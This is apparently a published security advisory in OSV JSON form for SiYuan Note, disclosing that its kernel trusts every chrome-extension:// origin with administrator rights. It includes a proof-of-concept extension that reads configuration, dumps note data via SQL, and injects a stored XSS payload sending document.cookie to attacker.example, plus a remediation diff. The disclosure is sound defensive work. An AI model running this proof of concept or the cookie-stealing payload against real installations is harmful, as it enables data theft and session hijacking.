{"id":"GHSA-hvr9-72v2-fff3","summary":"SiYuan: Unauthenticated Admin API Access via Blanket chrome-extension:// Origin Allowlist","details":"## Summary\n\nSiYuan Note's kernel HTTP server unconditionally trusts all `chrome-extension://` origins, granting `RoleAdministrator` access to every installed browser extension without any authentication. Combined with the default empty `AccessAuthCode` on desktop installs, any Chrome/Chromium extension -- including a compromised legitimate extension via supply chain attack -- can make fully authenticated admin API calls to the SiYuan kernel at `127.0.0.1:6806`, enabling data exfiltration, stored XSS injection, and configuration tampering.\n\n## Affected Versions\n\nSiYuan \u003c= v3.6.5 (commit `96dfe0bea474`). The chrome-extension allowlist remains unfixed as of the latest commit on the fix branch (`d7b77d945e0d`).\n\n## Vulnerability Details\n\n### Blanket chrome-extension:// Origin Trust (CWE-346)\n\nIn `kernel/model/session.go:277`, the `CheckAuth` middleware exempts all `chrome-extension://` origins from authentication:\n\n```go\nif strings.HasPrefix(origin, \"chrome-extension://\") {\n    // skip auth\n}\n```\n\nAt `session.go:284`, the request is assigned `RoleAdministrator`:\n\n```go\nc.Set(\"role\", model.RoleAdministrator)\n```\n\nThe `AccessAuthCode` field defaults to an empty string for desktop installs (`ContainerStd`). When empty, no token validation occurs. This means **any** Chrome/Chromium extension can make fully authenticated admin API calls to the SiYuan kernel.\n\nThe origin check trusts the entire `chrome-extension://` scheme rather than validating a specific extension ID, so every installed extension (including those with no explicit `host_permissions`) can access all admin endpoints.\n\n## Proof of Concept\n\n**Unauthenticated admin API access via browser extension:**\n\nA minimal Chrome extension with only default permissions:\n\n```json\n{\n  \"manifest_version\": 3,\n  \"name\": \"SiYuan PoC\",\n  \"version\": \"1.0\",\n  \"background\": {\n    \"service_worker\": \"bg.js\"\n  }\n}\n```\n\n```javascript\n// bg.js -- runs as chrome-extension://\u003cid\u003e\n// No special host_permissions needed; localhost is accessible by default\n\n// 1. Verify admin access\nfetch('http://127.0.0.1:6806/api/system/getConf', {\n  method: 'POST',\n  headers: { 'Content-Type': 'application/json' },\n  body: '{}'\n}).then(r =\u003e r.json()).then(data =\u003e {\n  console.log('[PoC] Admin API access confirmed:', data.code === 0);\n});\n\n// 2. Exfiltrate workspace data\nfetch('http://127.0.0.1:6806/api/query/sql', {\n  method: 'POST',\n  headers: { 'Content-Type': 'application/json' },\n  body: JSON.stringify({ stmt: 'SELECT * FROM blocks LIMIT 100' })\n}).then(r =\u003e r.json()).then(data =\u003e {\n  console.log('[PoC] Exfiltrated blocks:', data.data?.length);\n});\n\n// 3. Inject stored XSS payload into a note\nfetch('http://127.0.0.1:6806/api/filetree/listDocsByPath', {\n  method: 'POST',\n  headers: { 'Content-Type': 'application/json' },\n  body: JSON.stringify({ notebook: '', path: '/' })\n}).then(r =\u003e r.json()).then(tree =\u003e {\n  const firstDoc = tree.data?.files?.[0];\n  if (!firstDoc) return;\n\n  fetch('http://127.0.0.1:6806/api/block/insertBlock', {\n    method: 'POST',\n    headers: { 'Content-Type': 'application/json' },\n    body: JSON.stringify({\n      dataType: 'markdown',\n      data: '\u003cimg src=x onerror=\"fetch(\\'https://attacker.example/steal?data=\\'+document.cookie)\"\u003e',\n      parentID: firstDoc.id\n    })\n  });\n});\n```\n\nThe extension requires zero special permissions. The `chrome-extension://` origin header is automatically sent by the browser, and `session.go:277` grants it `RoleAdministrator` without any token check.\n\n## Impact\n\n- **Unauthenticated admin API access** for any installed browser extension, enabling full control of the SiYuan kernel\n- **Data exfiltration** of the entire workspace via `/api/query/sql`, `/api/filetree/`, `/api/export/`\n- **Stored XSS injection** via admin API endpoints (`/api/block/insertBlock`, `/api/attr/setBlockAttrs`), persisted in the user's notes\n- **Configuration tampering** via `/api/system/setConf`, enabling persistence and further attack surface expansion\n- **Supply chain amplification**: a single compromised popular Chrome extension update can silently exploit every SiYuan desktop user\n\n## Suggested Remediation\n\n**Remove blanket chrome-extension:// allowlist:**\n\n```diff\n--- a/kernel/model/session.go\n+++ b/kernel/model/session.go\n@@ -274,9 +274,6 @@\n func CheckAuth(c *gin.Context) {\n     origin := c.GetHeader(\"Origin\")\n-    if strings.HasPrefix(origin, \"chrome-extension://\") {\n-        // Allow chrome extension requests\n-    } else\n     if !isValidOrigin(origin) {\n         c.AbortWithStatusJSON(401, gin.H{\"code\": -1, \"msg\": \"invalid origin\"})\n         return\n```\n\nIf extension access is required, implement a per-session token exchange: the SiYuan UI generates a random token on startup, and the extension must present it via a dedicated pairing endpoint. This ensures only explicitly authorized extensions can access the API.","aliases":["CVE-2026-54069","GO-2026-5961"],"modified":"2026-07-21T19:18:53.216341280Z","published":"2026-07-10T19:26:06Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2026-07-10T19:26:06Z","nvd_published_at":"2026-06-24T22:16:48Z","cwe_ids":["CWE-346"],"severity":"CRITICAL"},"references":[{"type":"WEB","url":"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hvr9-72v2-fff3"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-54069"},{"type":"PACKAGE","url":"https://github.com/siyuan-note/siyuan"}],"affected":[{"package":{"name":"github.com/siyuan-note/siyuan/kernel","ecosystem":"Go","purl":"pkg:golang/github.com/siyuan-note/siyuan/kernel"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"0.0.0-20260628153353-2d5d72223df4"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-hvr9-72v2-fff3/GHSA-hvr9-72v2-fff3.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"}]}